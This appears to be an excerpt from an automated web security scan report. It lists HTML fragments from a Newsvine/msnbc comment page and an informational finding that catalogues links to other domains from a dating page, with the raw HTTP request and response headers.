<a href="#star12" class="noborder star"><img src="http://www.polls.newsvine.com/_vine/images/_/b_star.gif" width="16" height="16" alt="" title="Jump To Next Highly Rated Comment" /></a><a href="http://johntitor1.newsvine.com/">John Titor</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<a href="#star13" class="noborder star"><img src="http://www.polls.newsvine.com/_vine/images/_/b_star.gif" width="16" height="16" alt="" title="Jump To Next Highly Rated Comment" /></a><a href="http://MahmoodAbidizajahd.newsvine.com/">Mahmood Abidizajahd</a><span class="collapseDiv"><img src="http://www.polls.newsvine.com/_vine/images/_/b_expandcomment.gif" width="9" height="9" alt="Expand Comment" title="Expand Comment" /> Comment collapsed by the community</span>
...[SNIP]...
<a href="#star14" class="noborder star"><img src="http://www.polls.newsvine.com/_vine/images/_/b_star.gif" width="16" height="16" alt="" title="Jump To Next Highly Rated Comment" /></a><a href="http://Melissa2673591.newsvine.com/">Melissa-2673591</a>
...[SNIP]...
<a href="#star15" class="noborder star"><img src="http://www.polls.newsvine.com/_vine/images/_/b_star.gif" width="16" height="16" alt="" title="Jump To Next Highly Rated Comment" /></a><a href="http://Lamortdelioncourt.newsvine.com/">lamort DeLioncourt</a>
...[SNIP]...
<a href="#star16" class="noborder star"><img src="http://www.polls.newsvine.com/_vine/images/_/b_star.gif" width="16" height="16" alt="" title="Jump To Next Highly Rated Comment" /></a><a href="http://Smarterthanyou2999028.newsvine.com/">Smarter than you-2999028</a><span class="collapseDiv"><img src="http://www.polls.newsvine.com/_vine/images/_/b_expandcomment.gif" width="9" height="9" alt="Expand Comment" title="Expand Comment" /> Comment collapsed by the community</span>
...[SNIP]...
<div class="normal"><a href="http://lbjack.newsvine.com/">lbjack</a>
...[SNIP]...
<div class="normal"><a href="http://GenericName.newsvine.com/">GenericName</a>
...[SNIP]...
<div class="normal"><a href="http://MintyFreshness.newsvine.com/">Minty Freshness</a>
...[SNIP]...
<div class="normal"><a href="http://justiceforall2038290.newsvine.com/">justiceforall-2038290</a>
...[SNIP]...
<div class="clearfix"><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /></div>
...[SNIP]...
<a href="#star17" class="noborder star"><img src="http://www.polls.newsvine.com/_vine/images/_/b_star.gif" width="16" height="16" alt="" title="Jump To Next Highly Rated Comment" /></a><a href="http://gregb2.newsvine.com/">GregB-2059108</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<a href="#star18" class="noborder star"><img src="http://www.polls.newsvine.com/_vine/images/_/b_star.gif" width="16" height="16" alt="" title="Jump To Next Highly Rated Comment" /></a><a href="http://CRStardust.newsvine.com/">Stardust-649419</a>
...[SNIP]...
<div class="clearfix"><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /></div>
...[SNIP]...
<div class="normal"><a href="http://AndieSanDiegoCA.newsvine.com/">Andie,San Diego, CA</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="clearfix"><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /></div>
...[SNIP]...
<a href="#star19" class="noborder star"><img src="http://www.polls.newsvine.com/_vine/images/_/b_star.gif" width="16" height="16" alt="" title="Jump To Next Highly Rated Comment" /></a><a href="http://demmcc.newsvine.com/">dave-1186103</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<a href="#star20" class="noborder star"><img src="http://www.polls.newsvine.com/_vine/images/_/b_star.gif" width="16" height="16" alt="" title="Jump To Next Highly Rated Comment" /></a><a href="http://Benjamin35.newsvine.com/">Benjamin-358843</a>
...[SNIP]...
<div class="clearfix"><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /></div>
...[SNIP]...
<div class="normal"><a href="http://optomyst-1.newsvine.com/">Optomyst</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="clearfix"><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /></div>
...[SNIP]...
<div class="normal"><a href="http://DaveKnightstable.newsvine.com/">Dave Knightstable</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<a href="#star21" class="noborder star"><img src="http://www.polls.newsvine.com/_vine/images/_/b_star.gif" width="16" height="16" alt="" title="Jump To Next Highly Rated Comment" /></a><a href="http://greg-51.newsvine.com/">99octane</a>
...[SNIP]...
<div class="clearfix"><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /></div>
...[SNIP]...
<a href="#star22" class="noborder star"><img src="http://www.polls.newsvine.com/_vine/images/_/b_star.gif" width="16" height="16" alt="" title="Jump To Next Highly Rated Comment" /></a><a href="http://wtfever.newsvine.com/">ZillaKilla</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://n2nh2000.newsvine.com/">JohnS-WRJ-VT</a>
...[SNIP]...
<div class="normal"><a href="http://threeboysmom.newsvine.com/">MG from IL</a>
...[SNIP]...
<div class="normal"><a href="http://LynnGrant.newsvine.com/">Lynn Grant</a>
...[SNIP]...
<div class="normal"><a href="http://MarySusan.newsvine.com/">just wonderin</a>
...[SNIP]...
<div class="normal"><a href="http://Darthdon.newsvine.com/">Darthdon</a>
...[SNIP]...
<div class="normal"><a href="http://mtg303.newsvine.com/">Mtg303</a>
...[SNIP]...
<div class="normal"><a href="http://mtg303.newsvine.com/">Mtg303</a>
...[SNIP]...
<div class="normal"><a href="http://Darthdon.newsvine.com/">Darthdon</a>
...[SNIP]...
<div class="normal"><a href="http://mtg303.newsvine.com/">Mtg303</a>
...[SNIP]...
<div class="normal"><a href="http://ra-rishikavi-raghudas.newsvine.com/">The Poet</a>
...[SNIP]...
<div class="normal"><a href="http://Darthdon.newsvine.com/">Darthdon</a>
...[SNIP]...
<div class="normal"><a href="http://justiceforall2038290.newsvine.com/">justiceforall-2038290</a>
...[SNIP]...
<div class="normal"><a href="http://cc-f.newsvine.com/">LameStory</a>
...[SNIP]...
<div class="clearfix"><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /></div>
...[SNIP]...
</div><script src="http://content.pulse360.com/42EBFC62-1F4E-11E0-AB70-41F5E4064C68" type="text/javascript"></script>
...[SNIP]...
</div><script src="http://content.pulse360.com/517F9430-C0FA-11DF-831B-94A93FF5047F" type="text/javascript"></script>
...[SNIP]...
<div class="normal"><a href="http://angie1939907.newsvine.com/">angie-1939907</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://piotrpanne.newsvine.com/">cheetah-822547</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://Davethedoubter.newsvine.com/">Dave the doubter</a>
...[SNIP]...
<div class="normal"><a href="http://RJohnson1998028.newsvine.com/">R Johnson-1998028</a>
...[SNIP]...
<div class="clearfix"><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /></div>
...[SNIP]...
<div class="normal"><a href="http://Darthdon.newsvine.com/">Darthdon</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<a href="#star23" class="noborder star"><img src="http://www.polls.newsvine.com/_vine/images/_/b_star.gif" width="16" height="16" alt="" title="Jump To Next Highly Rated Comment" /></a><a href="http://DoubleG2996677.newsvine.com/">DoubleG-2996677</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://cindy2999049.newsvine.com/">cindy-2999049</a>
...[SNIP]...
<div class="clearfix"><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /></div>
...[SNIP]...
<div class="normal"><a href="http://morphine-carnival.newsvine.com/">~m~(O)~r~phine Carnival</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://lola3.newsvine.com/">lola3</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://declan01.newsvine.com/">dman-353357</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://BlackshoesBlacksocks.newsvine.com/">BlackshoesBlacksocks</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<a href="#star24" class="noborder star"><img src="http://www.polls.newsvine.com/_vine/images/_/b_star.gif" width="16" height="16" alt="" title="Jump To Next Highly Rated Comment" /></a><a href="http://trobertz.newsvine.com/">scales67</a>
...[SNIP]...
<p><a href="http://blackshoesblacksocks.newsvine.com/">BlackshoesBlacksocks</a>
...[SNIP]...
<div class="normal"><a href="http://Davethedoubter.newsvine.com/">Dave the doubter</a>
...[SNIP]...
<div class="clearfix"><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /></div>
...[SNIP]...
<div class="normal"><a href="http://KrasnaLudec.newsvine.com/">Krasna Ludec</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<a href="#star25" class="noborder star"><img src="http://www.polls.newsvine.com/_vine/images/_/b_star.gif" width="16" height="16" alt="" title="Jump To Next Highly Rated Comment" /></a><a href="http://AJPAGE.newsvine.com/">Page CN</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<a href="#star26" class="noborder star"><img src="http://www.polls.newsvine.com/_vine/images/_/b_star.gif" width="16" height="16" alt="" title="Jump To Next Highly Rated Comment" /></a><a href="http://selmor101.newsvine.com/">Roger-535160</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://Alan1380274.newsvine.com/">Alan-1380274</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://Davethedoubter.newsvine.com/">Dave the doubter</a>
...[SNIP]...
<div class="normal"><a href="http://mar2892158.newsvine.com/">mar-2892158</a>
...[SNIP]...
<div class="normal"><a href="http://mar2892158.newsvine.com/">mar-2892158</a>
...[SNIP]...
<div class="normal"><a href="http://n2nh2000.newsvine.com/">JohnS-WRJ-VT</a>
...[SNIP]...
<div class="normal"><a href="http://stspecialk.newsvine.com/">stspecialk</a>
...[SNIP]...
<div class="clearfix"><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /></div>
...[SNIP]...
<div class="normal"><a href="http://morriswise2276198.newsvine.com/">morris wise-2276198</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://n2nh2000.newsvine.com/">JohnS-WRJ-VT</a>
...[SNIP]...
<div class="clearfix"><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /></div>
...[SNIP]...
<div class="normal"><a href="http://henrybadgood.newsvine.com/">henrybadgood</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://jtjsrch.newsvine.com/">John-334951</a>
...[SNIP]...
<div class="clearfix"><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /></div>
...[SNIP]...
</div><script src="http://content.pulse360.com/42EBFC62-1F4E-11E0-AB70-41F5E4064C68" type="text/javascript"></script>
...[SNIP]...
</div><script src="http://content.pulse360.com/517F9430-C0FA-11DF-831B-94A93FF5047F" type="text/javascript"></script>
...[SNIP]...
<a href="#star27" class="noborder star"><img src="http://www.polls.newsvine.com/_vine/images/_/b_star.gif" width="16" height="16" alt="" title="Jump To Next Highly Rated Comment" /></a><a href="http://ALLY2998591.newsvine.com/">ALLY-2998591</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://n2nh2000.newsvine.com/">JohnS-WRJ-VT</a>
...[SNIP]...
<div class="normal"><a href="http://2wylde4u.newsvine.com/">2Wylde4U</a>
...[SNIP]...
<div class="normal"><a href="http://ray2105828.newsvine.com/">ray-2105828</a>
...[SNIP]...
<div class="normal"><a href="http://concerned2999376.newsvine.com/">concerned-2999376</a>
...[SNIP]...
<div class="clearfix"><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /></div>
...[SNIP]...
<div class="normal"><a href="http://EvilJason.newsvine.com/">Evil Jason</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://mtg303.newsvine.com/">Mtg303</a>
...[SNIP]...
<div class="normal"><a href="http://17762999337.newsvine.com/">1776-2999337</a>
...[SNIP]...
<div class="clearfix"><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /></div>
...[SNIP]...
<div class="normal"><a href="http://Freemannogod.newsvine.com/">Freemannogod</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://GooGooNanny.newsvine.com/">GooGooNanny</a>
...[SNIP]...
<div class="clearfix"><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /></div>
...[SNIP]...
<div class="privacytext"><a href="http://www.newsvine.com/_nv/cms/info/privacyPolicy" target="_blank">Newsvine Privacy Statement</a></div><img class="postCommentImage" src="http://www.polls.newsvine.com/_vine/images/_/b_postcomment.gif" /><img class="postingCommentImage" src="http://www.polls.newsvine.com/_vine/images/_/b_posting.gif" /></div>
...[SNIP]...
<div class="newuser">As a new user, you may notice a few temporary content restrictions. <a href="http://www.newsvine.com/_nv/cms/help/newUsers" target="_blank">Click here for more info</a>
...[SNIP]...
<span><img src="http://www.polls.newsvine.com/_vine/images/_/icon_track_mini.gif" width="12" height="12" alt="Start Tracking" title="Add this article to your conversation tracker without commenting on it" />Start Tracking</span>
...[SNIP]...
<span><img src="http://www.polls.newsvine.com/_vine/images/_/icon_stop_mini.gif" width="10" height="10" alt="Stop Tracking" />Stop Tracking</span>
...[SNIP]...
</div><script src="http://content.pulse360.com/42EBFC62-1F4E-11E0-AB70-41F5E4064C68" type="text/javascript"></script>
...[SNIP]...
</div><script src="http://content.pulse360.com/517F9430-C0FA-11DF-831B-94A93FF5047F" type="text/javascript"></script>
...[SNIP]...
<div class="avatar"><a href="http://boyle.newsvine.com/"><img class="noborder" src="http://www.polls.newsvine.com/_vine/images/av/60x60/boyle-747955448.jpg" width="60" height="60" /></a>
...[SNIP]...
<li><a href="http://blogs.discovermagazine.com/badastronomy/">Bad Astronomy</a>
...[SNIP]...
<li><a href="http://www.collectspace.com/">CollectSpace</a>
...[SNIP]...
<li><a href="http://blogs.discovermagazine.com/cosmicvariance/">Cosmic Variance</a>
...[SNIP]...
<li><a href="http://curmudgeons.blogspot.com/">Curmudgeons Corner</a>
...[SNIP]...
<li><a href="http://news.discovery.com/">Discovery News</a>
...[SNIP]...
<li><a href="http://www.dailygrail.com/">The Daily Grail</a>
...[SNIP]...
<li><a href="http://earthsky.org/">EarthSky</a></li><li><a href="http://www.geekpress.com/">GeekPress</a></li><li><a href="http://www.habitablezone.com/space/">Habitable Zone</a>
...[SNIP]...
<li><a href="http://www.hobbyspace.com/">HobbySpace Log</a>
...[SNIP]...
<li><a href="http://www.livescience.com/">LiveScience</a>
...[SNIP]...
<li><a href="http://blogs.discovermagazine.com/loom/">The Loom</a></li><li><a href="http://www.nasawatch.com/">NASA Watch</a></li><li><a href="http://www.nasaspaceflight.com/">NASA Spaceflight</a>
...[SNIP]...
<li><a href="http://www.outofthecradle.net/">Out of the Cradle</a>
...[SNIP]...
<li><a href="http://www.scidev.net/">SciDev.net</a></li><li><a href="http://www.scienceblog.com/cms/index.php">Science Blog</a>
...[SNIP]...
<li><a href="http://www.scienceblogs.com/">ScienceBlogs</a>
...[SNIP]...
<li><a href="http://www.signonsandiego.com/news/blogs/science-quest/">Science Quest</a>
...[SNIP]...
<li><a href="http://www.scientificamerican.com/blog/observations/">SciAm Observations</a>
...[SNIP]...
<li><a href="http://seedmagazine.com/">Seed Magazine</a>
...[SNIP]...
<li><a href="http://science.slashdot.org">Slashdot Science</a>
...[SNIP]...
<li><a href="http://www.space.com/">Space.com</a></li><li><a href="http://www.spacedaily.com/">Spaceflight Now</a>
...[SNIP]...
<li><a href="http://spacefellowship.com/">Space Fellowship</a>
...[SNIP]...
<li><a href="http://www.thespacereview.com/">The Space Review</a>
...[SNIP]...
<li><a href="http://www.transterrestrial.com/">Transterrestrial Musings</a>
...[SNIP]...
<li><a href="http://http://www.universetoday.com/">Universe Today</a>
...[SNIP]...
<li><a href="http://www.unmannedspaceflight.com">Unmanned Spaceflight</a>
...[SNIP]...
<li><a href="http://trueslant.com/milesobrien/">Uplink by Miles O'Brien</a>
...[SNIP]...
<li><a href="http://planetary.org/blog">Planetary Society Blog</a>
...[SNIP]...
<li><a href="http://www.sciencenews.org/">Science News</a>
...[SNIP]...
<li><a href="http://www.popularmechanics.com/">Popular Mechanics</a>
...[SNIP]...
<li><a href="http://www.popsci.com/">Popular Science</a>
...[SNIP]...
<li><a href="http://news.sciencemag.org/scienceinsider/">Science Insider</a>
...[SNIP]...
<li><a href="http://nasaengineer.com/">NASAEngineer.com</a>
...[SNIP]...
<li><a href="http://eurekalert.org/">EurekAlert</a></li><li><a href="http://blogs.nature.com/news/thegreatbeyond/">Nature: The Great Beyond</a>
...[SNIP]...
<li><a href="http://www.spacedaily.com/">Space Daily</a>
...[SNIP]...
<li><a href="http://www.spacepolitics.com">Space Politics</a>
...[SNIP]...
<div class="rawhtml_contents clearer clearfix rawhtml_BlogAuthorPromo"><a href="http://www.thecaseforpluto.com/" title="The Case for Pluto"><img src="http://www.thecaseforpluto.com/cover.jpg" width="85" height="129" align="left" border="0" style="padding:0 10px 10px 0;" /></a>Alan Boyle's first book tells the story of Pluto's ups and downs as well as the discoveries of other dwarf planets in our own solar system and even more alien worlds beyond. <a href="http://www.thecaseforpluto.com/" title="The Case for Pluto">Buy "The Case for Pluto" ...</a>
...[SNIP]...
<div class="avatar"><a href="http://jimseida.newsvine.com/"><img class="noborder" src="http://www.polls.newsvine.com/_vine/images/av/60x60/cycler-1339318757.jpg" width="60" height="60" /></a>
...[SNIP]...
<div class="avatar"><a href="http://john-roach.newsvine.com/"><img class="noborder" src="http://www.polls.newsvine.com/_vine/images/av/60x60/jtroach-2120073942.jpg" width="60" height="60" /></a>
...[SNIP]...
<li><a href="http://redtape.msnbc.com/">Red Tape Chronicles</a>
...[SNIP]...
<a href="http://www.msnbc.redacted/"><img src="http://lib.newsvine.com/chrome/abstractmartinblog/images/msnbc-logo.png" alt="msnbc.com" width="166" height="20"></a>
...[SNIP]...
<li>
                   <a href="http://privacy.microsoft.com/en-us/default.aspx?SU=http://msnbc.redacted/">MSN Privacy</a>
...[SNIP]...
<li>
                   <a href="http://help.live.com/help.aspx?project=tou&mkt=en-us">Legal</a>
...[SNIP]...
</div><link rel="stylesheet" type="text/css" href="http://lib.newsvine.com/Pierre/widgets/wetbar/wetbar.css">
<script type="text/javascript" language="JavaScript">
...[SNIP]...

22.61. http://dating.redacted/cp.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://dating.redacted
Path:	/cp.aspx

Issue detail

The page was loaded from a URL containing a query string:

http://dating.redacted/cp.aspx?cpp=/en-us/partner/msn/38028.html&trackingid=526133&bannerid=722762&gc=1&tr=2&keyword=outdoors&gt1=26000

The response contains the following links to other domains:

http://cp.match.com/cppp/msn/css/lib.msn.cobrand.hdr.2010.css
http://cp.match.com/cppp/msn/js/google.js
http://cp.match.com/cppp/msn/js/lib.msn.cobrand.core.2010.js
http://cp.match.com/cppp/msn/js/lib.msn.cobrand.mozcompat.2010.js
http://cp.match.com/en-us/partner/msn/38028.css
http://cp.match.com/en-us/partner/msn/images/38028_btm.png
http://cp.match.com/en-us/partner/msn/images/38028_btnClickHere.gif
http://cp.match.com/en-us/partner/msn/images/38028_btnSearch.gif
http://cp.match.com/en-us/partner/msn/images/viewPhotosCTA.gif
http://cp.match.com/scripts/jquery.pngFix.js
http://download.live.com/?sku=messenger
http://images.match.com/match/msn/cobrand/poweredby_Match.png
http://images.match.com/s.gif
http://msn.careerbuilder.com/?siteid=cbmsn_home&sc_cmp1=JS_MSN_Home
http://msn.foxsports.com/
http://msn.foxsports.com/cbk
http://msn.foxsports.com/fantasy
http://msn.foxsports.com/foxsoccer
http://msn.foxsports.com/golf
http://msn.foxsports.com/mlb
http://msn.foxsports.com/nascar
http://msn.foxsports.com/nba
http://msn.foxsports.com/nfl
http://msn.foxsports.com/nhl
http://msn.foxsports.com/video?from=en-us_msnhp
http://msn.whitepages.com/
http://msnportaldating.112.2o7.net/b/ss/msnportaldating/1/H.1--NS/0
http://passport.match.com/passport/ppLogin.asp
http://sthumbnails.match.com/sthumbnails/13/40/96771340A.jpeg
http://sthumbnails.match.com/sthumbnails/13/57/62661357E.jpeg
http://sthumbnails.match.com/sthumbnails/13/94/80911394A.jpeg
http://sthumbnails.match.com/sthumbnails/24/55/97182455G.jpeg
http://sthumbnails.match.com/sthumbnails/29/76/98462976A.jpeg
http://sthumbnails.match.com/sthumbnails/34/25/97343425A.jpeg
http://sthumbnails.match.com/sthumbnails/48/81/78874881A.jpeg
http://sthumbnails.match.com/sthumbnails/57/61/98085761D.jpeg
http://sthumbnails.match.com/sthumbnails/57/71/54295771D.jpeg
http://sthumbnails.match.com/sthumbnails/59/69/91385969O.jpeg
http://sthumbnails.match.com/sthumbnails/63/91/90146391T.jpeg
http://sthumbnails.match.com/sthumbnails/67/15/93936715M.jpeg
http://sthumbnails.match.com/sthumbnails/67/39/93586739A.jpeg
http://sthumbnails.match.com/sthumbnails/70/27/97217027B.jpeg
http://sthumbnails.match.com/sthumbnails/76/24/69817624R.jpeg
http://sthumbnails.match.com/sthumbnails/83/21/68758321O.jpeg
http://sthumbnails.match.com/sthumbnails/85/15/92818515B.jpeg
http://sthumbnails.match.com/sthumbnails/85/78/94808578E.jpeg
http://sthumbnails.match.com/sthumbnails/97/35/96829735A.jpeg
http://www.bing.com/maps/default.aspx?FORM=MSNNAV
http://www.bing.com/search?FORM=AX
http://www.bing.com/shopping?FORM=SHOPH2
http://www.bing.com/travel/?cid=msn_nav_lifestyle&FORM=MSNNAV
http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV
http://www.bing.com/videos/browse?from=en-us_msnhp
http://www.delish.com/
http://www.myhomeredacted/
https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB

Request

GET /cp.aspx?cpp=/en-us/partner/msn/38028.html&trackingid=526133&bannerid=722762&gc=1&tr=2&keyword=outdoors&gt1=26000 HTTP/1.1
Host: dating.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 29 Jan 2011 23:45:57 GMT
Server: Microsoft-IIS/6.0
P3p: CP="NOI DSP COR NID CUR OUR NOR"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Powered-By: UrlRewriter.NET 2.0.0
Set-Cookie: Match=CCount=1&CDate=1/29/2011; expires=Sun, 29-Jan-2012 23:45:55 GMT; path=/
Set-Cookie: dMatch=CCount=1&CDate=1/29/2011; domain=match.com; expires=Sun, 29-Jan-2012 23:45:55 GMT; path=/
Set-Cookie: MatchSession=CDTF=1/29/2011&UMID=c57fd076-00eb-4b20-b207-3fcd3f25ac2a; expires=Sun, 29-Jan-2012 23:45:55 GMT; path=/
Set-Cookie: SECU=TID=526133&ESID=6c55d63f-ab4d-469b-88ee-c43dd2c2cfaf&THEME=215; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 52522

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
<html>
   <head><meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7" /><link href="/styles/site/core.css?v=8.0.4043.20742" rel="st
...[SNIP]...
</script>

<script type="text/javascript" src="http://cp.match.com/cppp/msn/js/google.js"></script>
<script language="javascript" type="text/javascript" src="http://cp.match.com/scripts/jquery.pngFix.js"></script>
...[SNIP]...
</style>
<link href="http://cp.match.com/en-us/partner/msn/38028.css" rel="stylesheet" type="text/css" />
<title>
...[SNIP]...
<script type="text/javascript" src="http://cp.match.com/cppp/msn/js/lib.msn.cobrand.mozcompat.2010.js"></script>

<script type="text/javascript" src="http://cp.match.com/cppp/msn/js/lib.msn.cobrand.core.2010.js"></script>
...[SNIP]...
</script>
<link href="http://cp.match.com/cppp/msn/css/lib.msn.cobrand.hdr.2010.css" rel="stylesheet" type="text/css" />


...[SNIP]...
<div><img src="http://msnportaldating.112.2O7.net/b/ss/msnportaldating/1/H.1--NS/0" height="1" width="1" alt="" /></div>
...[SNIP]...
<li class="c3"><a href="http://msn.foxsports.com/">Sports</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/golf">Golf</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/mlb"> MLB</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nascar ">NASCAR</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nba">NBA</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cbk"><strong>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nfl">NFL</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nhl">NHL</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/fantasy">Play Fantasy</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/foxsoccer">Soccer</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/video?from=en-us_msnhp">Video</a>
...[SNIP]...
<li><a href="http://msn.careerbuilder.com?siteid=cbmsn_home&sc_cmp1=JS_MSN_Home"><strong>
...[SNIP]...
<li><a href="http://www.delish.com/"> Cooking</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_lifestyle&FORM=MSNNAV "> Travel</a>
...[SNIP]...
<li><a href="http://www.bing.com/videos/browse?from=en-us_msnhp">Video</a>
...[SNIP]...
<li><a href="http://www.delish.com/">Delish</a>
...[SNIP]...
<li><a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li><a href="http://www.bing.com/shopping?FORM=SHOPH2">Shopping</a>
...[SNIP]...
<li><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB"><strong>
...[SNIP]...
<li><a href="http://www.bing.com/maps/default.aspx?FORM=MSNNAV">Maps & Directions</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV ">Travel</a>
...[SNIP]...
